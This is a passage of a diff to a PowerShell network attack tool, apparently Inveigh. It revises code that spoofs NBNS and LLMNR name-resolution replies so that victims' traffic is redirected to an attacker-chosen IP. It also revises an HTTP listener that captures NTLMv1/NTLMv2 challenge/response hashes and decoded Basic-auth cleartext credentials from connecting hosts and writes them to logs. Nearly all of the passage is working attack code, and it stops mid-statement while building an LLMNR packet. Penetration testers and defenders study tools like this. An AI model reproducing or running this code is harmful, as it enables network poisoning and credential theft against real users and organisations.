@@ -990,8 +1111,7 @@ $HTTP_scriptblock =
                 } 
                     
                 $HTTP_NTLM_user_length = DataLength 36 $HTTP_request_bytes
-                $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_length $HTTP_NTLM_domain_length 0 $HTTP_NTLM_domain_offset $HTTP_request_bytes
-                        
+                $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_length $HTTP_NTLM_domain_length 0 $HTTP_NTLM_domain_offset $HTTP_request_bytes     
                 $HTTP_NTLM_host_length = DataLength 44 $HTTP_request_bytes
                 $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_length $HTTP_NTLM_domain_length $HTTP_NTLM_user_length $HTTP_NTLM_domain_offset $HTTP_request_bytes
         
@@ -1002,23 +1122,33 @@ $HTTP_scriptblock =
                     $NTLM_response = $NTLM_response.Insert(48,':')
                     $inveigh.HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_response + ":" + $NTLM_challenge
                     
-                    if((($NTLM_challenge -ne '') -and ($NTLM_response -ne '')) -and (($MachineAccounts -eq 'y') -or (($MachineAccounts -eq 'n') -and (-not $HTTP_NTLM_user_string.EndsWith('$')))))
+                    if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
                     {    
-                        $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ")")])
-                        $inveigh.NTLMv1_file_queue.add($inveigh.HTTP_NTLM_hash)
-                        $inveigh.NTLMv1_list.add($inveigh.HTTP_NTLM_hash)
-                        $inveigh.console_queue.add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + "):`n" + $inveigh.HTTP_NTLM_hash)
+                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ")")])
+                        $inveigh.NTLMv1_list.Add($inveigh.HTTP_NTLM_hash)
                         
-                        if($inveigh.file_output)
+                        if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains $inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
                         {
-                            $inveigh.console_queue.add("$HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file)
-                        }                   
+                            $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + "):`n" + $inveigh.HTTP_NTLM_hash)
+                        }
+                        else
+                        {
+                            $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ") for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
+                        }
+                        
+                        if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains ($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))))
+                        {
+                            $inveigh.NTLMv1_file_queue.Add($inveigh.HTTP_NTLM_hash)
+                            $inveigh.console_queue.Add("$HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file)
+                        }
+
+                        if($inveigh.NTLMv1_username_list -notcontains ($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
+                        {
+                            $inveigh.NTLMv1_username_list.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
+                        }
+
                     }
-                    
-                    if (($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address) -and (-not $HTTP_NTLM_user_string.EndsWith('$')) -and (!$inveigh.spoofer_repeat))
-                    {
-                        $inveigh.IP_capture_list += $inveigh.request.RemoteEndpoint.Address
-                    }
+
                 }
                 else # NTLMv2
                 {   
@@ -1027,48 +1157,129 @@ $HTTP_scriptblock =
                     $NTLM_response = $NTLM_response.Insert(32,':')
                     $inveigh.HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLM_response
                     
-                    if((($NTLM_challenge -ne '') -and ($NTLM_response -ne '')) -and (($MachineAccounts -eq 'y') -or (($MachineAccounts -eq 'n') -and (-not $HTTP_NTLM_user_string.EndsWith('$')))))
+                    if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
                     {
-                        $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.request.RemoteEndpoint.address + "(" + $HTTP_NTLM_host_string + ")")])
-                        $inveigh.NTLMv2_file_queue.add($inveigh.HTTP_NTLM_hash)
-                        $inveigh.NTLMv2_list.add($inveigh.HTTP_NTLM_hash)
-                        $inveigh.console_queue.add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from " + $inveigh.request.RemoteEndpoint.address + "(" + $HTTP_NTLM_host_string + "):`n" + $inveigh.HTTP_NTLM_hash)
+                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ")")])
+                        $inveigh.NTLMv2_list.Add($inveigh.HTTP_NTLM_hash)
                         
-                        if($inveigh.file_output)
+                        if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains ($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))
                         {
-                            $inveigh.console_queue.add("$HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file)
-                        }  
-                    }
-                    
-                    if (($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address) -and (-not $HTTP_NTLM_user_string.EndsWith('$')) -and (!$inveigh.spoofer_repeat))
-                    {
-                        $inveigh.IP_capture_list += $inveigh.request.RemoteEndpoint.Address
-                    }
+                            $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + "):`n" + $inveigh.HTTP_NTLM_hash)
+                        }
+                        else
+                        {
+                            $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ") for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
+                        }
+                        
+                        if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains ($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))))
+                        {
+                            $inveigh.NTLMv2_file_queue.Add($inveigh.HTTP_NTLM_hash)
+                            $inveigh.console_queue.Add("$HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file)
+                        }
+
+                        if($inveigh.NTLMv2_username_list -notcontains ($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
+                        {
+                            $inveigh.NTLMv2_username_list.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
+                        }
+
+                    } 
+
+                }
+
+                if($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address.IPAddressToString -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat)
+                {
+                    $inveigh.IP_capture_list.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString)
                 }
                 
                 $inveigh.response.StatusCode = 200
                 $NTLM_auth = $true
                 $NTLM_challenge = ''
+                $HTTP_raw_url_output = $true
+
             }
             else
             {
                 $NTLM = 'NTLM'
             }
+
         }
-        elseif($authentication_header.startswith('Basic ')) # Thanks to @xorrior for the initial basic auth code
+        elseif($authentication_header.StartsWith('Basic ')) # Thanks to @xorrior for the initial basic auth code
         {
             $inveigh.response.StatusCode = 200
+            $Basic_auth = $true
             $authentication_header = $authentication_header -replace 'Basic ',''
             $cleartext_credentials = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($authentication_header))
-            $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from " + $inveigh.request.RemoteEndpoint.address)])
-            $inveigh.cleartext_file_queue.add($cleartext_credentials)
-            $inveigh.cleartext_list.add($cleartext_credentials)
-            $inveigh.console_queue.add("$(Get-Date -format 's') - Basic auth cleartext credentials $cleartext_credentials captured from " + $inveigh.request.RemoteEndpoint.address)
+            $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from " + $inveigh.request.RemoteEndpoint.Address)])
+            $inveigh.cleartext_file_queue.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + ",$HTTP_type,$cleartext_credentials")
+            $inveigh.cleartext_list.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + ",$HTTP_type,$cleartext_credentials")
+            $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type Basic auth cleartext credentials $cleartext_credentials captured from " + $inveigh.request.RemoteEndpoint.Address)
 
             if($inveigh.file_output)
             {
-                $inveigh.console_queue.add("Basic auth cleartext credentials written to " + $inveigh.cleartext_out_file)
-            }     
+                $inveigh.console_queue.Add("$HTTP_type Basic auth cleartext credentials written to " + $inveigh.cleartext_out_file)
+            }
+                 
+        }
+
+        if(($HTTPAuth -eq 'Anonymous' -and $inveigh.request.RawUrl -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Anonymous' -and $inveigh.request.RawUrl -match '/wpad.dat') -or $NTLM_Auth -or $Basic_auth)
+        {
+
+            if($inveigh.HTTP_directory -and $inveigh.HTTP_default_EXE -and $inveigh.request.RawUrl -like '*.exe' -and (Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_EXE)) -and !(Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl)))
+            {
+                [Byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_EXE))
+            }
+            elseif($inveigh.HTTP_directory)
+            {
+
+                if($inveigh.HTTP_default_file -and !(Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl)) -and (Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file)) -and $inveigh.request.RawUrl -notmatch '/wpad.dat')
+                {
+                    [Byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file))
+                }
+                elseif($inveigh.HTTP_default_file -and $inveigh.request.RawUrl -eq '/' -and (Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file)))
+                {
+                    [Byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file))
+                }
+                elseif($inveigh.WPAD_response -and $inveigh.request.RawUrl -match '/wpad.dat')
+                {
+                    [Byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.WPAD_response)
+                }
+                else
+                {
+
+                    if(Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl))
+                    {
+                        [Byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl))
+                    }
+                    else
+                    {
+                        [Byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.HTTP_response)
+                    }
+            
+                }
+
+            }
+            else
+            {
+
+                if($inveigh.request.RawUrl -match '/wpad.dat')
+                {
+                    $inveigh.message = $inveigh.WPAD_response
+                }
+                elseif($inveigh.HTTP_response)
+                {
+                    $inveigh.message = $inveigh.HTTP_response
+                }
+                else
+                {
+                    $inveigh.message = $null
+                }
+
+                [Byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.message)
+            }
+        }
+        else
+        {
+            [Byte[]] $HTTP_buffer = $null
         }
 
         if(($HTTPAuth -eq 'NTLM' -and $inveigh.request.RawUrl -notmatch '/wpad.dat') -or ($WPADAuth -eq 'NTLM' -and $inveigh.request.RawUrl -match '/wpad.dat') -and !$NTLM_auth)
@@ -1084,54 +1295,50 @@ $HTTP_scriptblock =
             $inveigh.response.StatusCode = 200
         }
 
-        $inveigh.response.ContentLength64 = $HTTP_buffer.length
+        $inveigh.response.ContentLength64 = $HTTP_buffer.Length
         $HTTP_stream = $inveigh.response.OutputStream
-        $HTTP_stream.write($HTTP_buffer, 0, $HTTP_buffer.length)
-        $HTTP_stream.close()
+        $HTTP_stream.Write($HTTP_buffer,0,$HTTP_buffer.Length)
+        $HTTP_stream.Close()
     }
 
     $inveigh.HTTP_listener.Stop()
     $inveigh.HTTP_listener.Close()
-
 }
 
 # Sniffer/Spoofer ScriptBlock - LLMNR/NBNS Spoofer and SMB sniffer
 $sniffer_scriptblock = 
 {
-    param ($LLMNR_response_message,$NBNS_response_message,$IP,$SpooferIP,$SMB,$LLMNR,$NBNS,$NBNSTypes,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$MachineAccounts,$RunTime,$LLMNRTTL,$NBNSTTL)
+    param ($LLMNR_response_message,$NBNS_response_message,$IP,$SpooferIP,$SMB,$LLMNR,$NBNS,$NBNSTypes,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$RunTime,$LLMNRTTL,$NBNSTTL)
 
-    $byte_in = New-Object Byte[] 4	
-    $byte_out = New-Object Byte[] 4	
-    $byte_data = New-Object Byte[] 4096
-    $byte_in[0] = 1  					
+    $byte_in = New-Object System.Byte[] 4	
+    $byte_out = New-Object System.Byte[] 4	
+    $byte_data = New-Object System.Byte[] 4096
+    $byte_in[0] = 1
     $byte_in[1-3] = 0
     $byte_out[0] = 1
     $byte_out[1-3] = 0
     $inveigh.sniffer_socket = New-Object System.Net.Sockets.Socket([Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Raw,[Net.Sockets.ProtocolType]::IP)
     $inveigh.sniffer_socket.SetSocketOption("IP","HeaderIncluded",$true)
     $inveigh.sniffer_socket.ReceiveBufferSize = 1024
-    $end_point = New-Object System.Net.IPEndpoint([Net.IPAddress]"$IP", 0)
+    $end_point = New-Object System.Net.IPEndpoint([System.Net.IPAddress]"$IP",0)
     $inveigh.sniffer_socket.Bind($end_point)
-    [void]$inveigh.sniffer_socket.IOControl([Net.Sockets.IOControlCode]::ReceiveAll,$byte_in,$byte_out)
-    $LLMNR_TTL_bytes = [BitConverter]::GetBytes($LLMNRTTL)
-    [array]::Reverse($LLMNR_TTL_bytes)
-    $NBNS_TTL_bytes = [BitConverter]::GetBytes($NBNSTTL)
-    [array]::Reverse($NBNS_TTL_bytes)
+    $inveigh.sniffer_socket.IOControl([System.Net.Sockets.IOControlCode]::ReceiveAll,$byte_in,$byte_out)
+    $LLMNR_TTL_bytes = [System.BitConverter]::GetBytes($LLMNRTTL)
+    [Array]::Reverse($LLMNR_TTL_bytes)
+    $NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL)
+    [Array]::Reverse($NBNS_TTL_bytes)
 
     if($RunTime)
     {    
         $sniffer_timeout = new-timespan -Minutes $RunTime
-        $sniffer_stopwatch = [diagnostics.stopwatch]::StartNew()
+        $sniffer_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
     }
 
     while($inveigh.running)
     {
-        $packet_data = $inveigh.sniffer_socket.Receive($byte_data,0,$byte_data.length,[Net.Sockets.SocketFlags]::None)
-    
+        $packet_data = $inveigh.sniffer_socket.Receive($byte_data,0,$byte_data.Length,[System.Net.Sockets.SocketFlags]::None)
         $memory_stream = New-Object System.IO.MemoryStream($byte_data,0,$packet_data)
         $binary_reader = New-Object System.IO.BinaryReader($memory_stream)
-    
-        # IP header fields
         $version_HL = $binary_reader.ReadByte()
         $type_of_service= $binary_reader.ReadByte()
         $total_length = DataToUInt16 $binary_reader.ReadBytes(2)
@@ -1139,23 +1346,24 @@ $sniffer_scriptblock =
         $flags_offset = $binary_reader.ReadBytes(2)
         $TTL = $binary_reader.ReadByte()
         $protocol_number = $binary_reader.ReadByte()
-        $header_checksum = [Net.IPAddress]::NetworkToHostOrder($binary_reader.ReadInt16())
+        $header_checksum = [System.Net.IPAddress]::NetworkToHostOrder($binary_reader.ReadInt16())
         $source_IP_bytes = $binary_reader.ReadBytes(4)
         $source_IP = [System.Net.IPAddress]$source_IP_bytes
         $destination_IP_bytes = $binary_reader.ReadBytes(4)
         $destination_IP = [System.Net.IPAddress]$destination_IP_bytes
-        $IP_version = [int]"0x$(('{0:X}' -f $version_HL)[0])"
-        $header_length = [int]"0x$(('{0:X}' -f $version_HL)[1])" * 4
+        $IP_version = [Int]"0x$(('{0:X}' -f $version_HL)[0])"
+        $header_length = [Int]"0x$(('{0:X}' -f $version_HL)[1])" * 4
         
         switch($protocol_number)
         {
+
             6 
             {  # TCP
                 $source_port = DataToUInt16 $binary_reader.ReadBytes(2)
                 $destination_port = DataToUInt16 $binary_reader.ReadBytes(2)
                 $sequence_number = DataToUInt32 $binary_reader.ReadBytes(4)
-                $ack_number = DataToUInt32 $binary_reader.ReadBytes(4)
-                $TCP_header_length = [int]"0x$(('{0:X}' -f $binary_reader.ReadByte())[0])" * 4
+                $ack_number = DataToUInt32 $binary_reader.ReadBytes(12)
+                $TCP_header_length = [Int]"0x$(('{0:X}' -f $binary_reader.ReadByte())[0])" * 4
                 $TCP_flags = $binary_reader.ReadByte()
                 $TCP_window = DataToUInt16 $binary_reader.ReadBytes(2)
                 $TCP_checksum = [System.Net.IPAddress]::NetworkToHostOrder($binary_reader.ReadInt16())
@@ -1164,41 +1372,55 @@ $sniffer_scriptblock =
 
                 switch ($destination_port)
                 {
+
                     139 
                     {
-                        if($SMB -eq 'y')
+                        if($SMB -eq 'Y')
                         {
                             SMBNTLMResponse $payload_bytes
                         }
                     }
+
                     445
-                    { 
-                        if($SMB -eq 'y')
+                    {
+                     
+                        if($SMB -eq 'Y')
                         {
                             SMBNTLMResponse $payload_bytes
                         }
+                    
                     }
+
                 }
 
                 # Outgoing packets
                 switch ($source_port)
                 {
+
                     139 
                     {
-                        if($SMB -eq 'y')
+
+                        if($SMB -eq 'Y')
                         {   
                             $NTLM_challenge = SMBNTLMChallenge $payload_bytes
                         }
+                    
                     }
+
                     445 
                     {
-                        if($SMB -eq 'y')
+
+                        if($SMB -eq 'Y')
                         {   
                             $NTLM_challenge = SMBNTLMChallenge $payload_bytes
                         }
+                    
                     }
+                
                 }
-            }       
+
+            }
+                
             17 
             {  # UDP
                 $source_port =  $binary_reader.ReadBytes(2)
@@ -1206,78 +1428,92 @@ $sniffer_scriptblock =
                 $destination_port = DataToUInt16 $binary_reader.ReadBytes(2)
                 $UDP_length = $binary_reader.ReadBytes(2)
                 $UDP_length_uint  = DataToUInt16 ($UDP_length)
-                [void]$binary_reader.ReadBytes(2)
+                $binary_reader.ReadBytes(2)
                 $payload_bytes = $binary_reader.ReadBytes(($UDP_length_uint - 2) * 4)
 
                 # Incoming packets 
                 switch ($destination_port)
                 {
+
                     137 # NBNS
-                    { 
+                    {
+                     
                         if($payload_bytes[5] -eq 1 -and $IP -ne $source_IP)
                         {
                             $UDP_length[0] += 16
                         
-                            [Byte[]]$NBNS_response_data = $payload_bytes[13..$payload_bytes.length]`
-                                + $NBNS_TTL_bytes`
-                                + (0x00,0x06,0x00,0x00)`
-                                + ([IPAddress][String]([IPAddress]$SpooferIP)).GetAddressBytes()`
-                                + (0x00,0x00,0x00,0x00)
+                            $NBNS_response_data = $payload_bytes[13..$payload_bytes.Length] +
+                                                  $NBNS_TTL_bytes +
+                                                  0x00,0x06,0x00,0x00 +
+                                                  ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() +
+                                                  0x00,0x00,0x00,0x00
                 
-                            [Byte[]]$NBNS_response_packet = (0x00,0x89)`
-                                + $source_port[1,0]`
-                                + $UDP_length[1,0]`
-                                + (0x00,0x00)`
-                                + $payload_bytes[0,1]`
-                                + (0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20)`
-                                + $NBNS_response_data
+                            $NBNS_response_packet = 0x00,0x89 +
+                                                    $source_port[1,0] +
+                                                    $UDP_length[1,0] +
+                                                    0x00,0x00 +
+                                                    $payload_bytes[0,1] +
+                                                    0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 +
+                                                    $NBNS_response_data
                 
-                            $send_socket = New-Object Net.Sockets.Socket( [Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Raw,[Net.Sockets.ProtocolType]::Udp )
+                            $send_socket = New-Object Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp)
                             $send_socket.SendBufferSize = 1024
                             $destination_point = New-Object Net.IPEndpoint($source_IP,$endpoint_source_port)
-                    
                             $NBNS_query_type = [System.BitConverter]::ToString($payload_bytes[43..44])
                     
                             switch ($NBNS_query_type)
                             {
-                                '41-41' {
+
+                                '41-41'
+                                {
                                     $NBNS_query_type = '00'
                                 }
-                                '41-44' {
+
+                                '41-44'
+                                {
                                     $NBNS_query_type = '03'
                                 }
-                                '43-41' {
+
+                                '43-41'
+                                {
                                     $NBNS_query_type = '20'
                                 }
-                                '42-4C' {
+
+                                '42-4C'
+                                {
                                     $NBNS_query_type = '1B'
                                 }
-                                '42-4D' {
+
+                                '42-4D'
+                                {
                                 $NBNS_query_type = '1C'
                                 }
-                                '42-4E' {
+
+                                '42-4E'
+                                {
                                 $NBNS_query_type = '1D'
                                 }
-                                '42-4F' {
+
+                                '42-4F'
+                                {
                                 $NBNS_query_type = '1E'
                                 }
+
                             }
 
-                            $NBNS_query = [System.BitConverter]::ToString($payload_bytes[13..($payload_bytes.length - 4)])
+                            $NBNS_query = [System.BitConverter]::ToString($payload_bytes[13..($payload_bytes.Length - 4)])
                             $NBNS_query = $NBNS_query -replace "-00",""
-                            $NBNS_query = $NBNS_query.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
+                            $NBNS_query = $NBNS_query.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
                             $NBNS_query_string_encoded = New-Object System.String ($NBNS_query,0,$NBNS_query.Length)
                             $NBNS_query_string_encoded = $NBNS_query_string_encoded.Substring(0,$NBNS_query_string_encoded.IndexOf("CA"))
-                        
                             $NBNS_query_string_subtracted = ""
                             $NBNS_query_string = ""
-                        
                             $n = 0
                             
                             do
                             {
-                                $NBNS_query_string_sub = (([byte][char]($NBNS_query_string_encoded.Substring($n,1)))-65)
-                                $NBNS_query_string_subtracted += ([convert]::ToString($NBNS_query_string_sub,16))
+                                $NBNS_query_string_sub = (([Byte][Char]($NBNS_query_string_encoded.Substring($n,1))) - 65)
+                                $NBNS_query_string_subtracted += ([System.Convert]::ToString($NBNS_query_string_sub,16))
                                 $n += 1
                             }
                             until($n -gt ($NBNS_query_string_encoded.Length - 1))
@@ -1286,23 +1522,26 @@ $sniffer_scriptblock =
                     
                             do
                             {
-                                $NBNS_query_string += ([char]([convert]::toint16($NBNS_query_string_subtracted.Substring($n,2),16)))
+                                $NBNS_query_string += ([Char]([System.Convert]::ToInt16($NBNS_query_string_subtracted.Substring($n,2),16)))
                                 $n += 2
                             }
-                            until($n -gt ($NBNS_query_string_subtracted.Length - 1) -or $NBNS_query_string.length -eq 15)
+                            until($n -gt ($NBNS_query_string_subtracted.Length - 1) -or $NBNS_query_string.Length -eq 15)
 
-                            if($NBNS -eq 'y')
+                            if($NBNS -eq 'Y')
                             {
+
                                 if($NBNSTypes -contains $NBNS_query_type)
-                                { 
-                                    if ((!$SpooferHostsReply -or $SpooferHostsReply -contains $NBNS_query_string) -and (!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $NBNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and $inveigh.IP_capture_list -notcontains $source_IP)
+                                {
+                                 
+                                    if ((!$SpooferHostsReply -or $SpooferHostsReply -contains $NBNS_query_string) -and (!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $NBNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString))
                                     {
-                                        [void]$send_socket.sendTo( $NBNS_response_packet, $destination_point )
+                                        $send_socket.sendTo($NBNS_response_packet,$destination_point)
                                         $send_socket.Close()
                                         $NBNS_response_message = "- spoofed response has been sent"
                                     }
                                     else
                                     {
+
                                         if($SpooferHostsReply -and $SpooferHostsReply -notcontains $NBNS_query_string)
                                         {
                                             $NBNS_response_message = "- $NBNS_query_string is not on reply list"
@@ -1321,59 +1560,65 @@ $sniffer_scriptblock =
                                         }
                                         else
                                         {
-                                            $NBNS_response_message = "- spoof suppressed due to previous capture"
+                                            $NBNS_response_message = "- not spoofed due to previous capture"
                                         }
+                                    
                                     }
+
                                 }
                                 else
                                 {
                                     $NBNS_response_message = "- spoof not sent due to disabled type"
                                 }
+
                             }
 
-                            $inveigh.console_queue.add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")
-                            $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")])
+                            $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")
+                            $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")])
                         }
                     }
-                    5355 # LLMNR
-                    { 
-                        if([System.BitConverter]::ToString($payload_bytes[($payload_bytes.length - 4)..($payload_bytes.length - 3)]) -ne '00-1c') # ignore AAAA for now
-                        {
-                            $UDP_length[0] += $payload_bytes.length - 2
 
-                            [byte[]]$LLMNR_response_data = $payload_bytes[12..$payload_bytes.length]
-                                $LLMNR_response_data += $LLMNR_response_data`
-                                + $LLMNR_TTL_bytes`
-                                + (0x00,0x04)`
-                                + ([IPAddress][String]([IPAddress]$SpooferIP)).GetAddressBytes()
+                    5355 # LLMNR
+                    {
+
+                        if([System.BitConverter]::ToString($payload_bytes[($payload_bytes.Length - 4)..($payload_bytes.Length - 3)]) -ne '00-1c') # ignore AAAA for now
+                        {
+                            $UDP_length[0] += $payload_bytes.Length - 2
+                            $LLMNR_response_data = $payload_bytes[12..$payload_bytes.Length]
+
+                            $LLMNR_response_data += $LLMNR_response_data +
+                                                    $LLMNR_TTL_bytes +
+                                                    0x00,0x04 +
+                                                    ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes()
             
-                            [byte[]]$LLMNR_response_packet = (0x14,0xeb)`
-                                + $source_port[1,0]`
-                                + $UDP_length[1,0]`
-                                + (0x00,0x00)`
-                                + $payload_bytes[0,1]`
-                                + (0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00)`
-                                + $LLMNR_response_data
-            
-                            $send_socket = New-Object Net.Sockets.Socket( [Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Raw,[Net.Sockets.ProtocolType]::Udp )
-                            $send_socket.SendBufferSize = 1024
-                            $destination_point = New-Object Net.IPEndpoint($source_IP, $endpoint_source_port)
-     
-                            $LLMNR_query = [System.BitConverter]::ToString($payload_bytes[13..($payload_bytes.length - 4)])
-                            $LLMNR_query = $LLMNR_query -replace "-00",""
-                            $LLMNR_query = $LLMNR_query.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
-                            $LLMNR_query_string = New-Object System.String ($LLMNR_query,0,$LLMNR_query.Length)
+                            $LLMNR_response_packet = 0x14,0xeb +
+                                                     $source_port[1,0] +
+                                                     $UDP_length[1,0] +
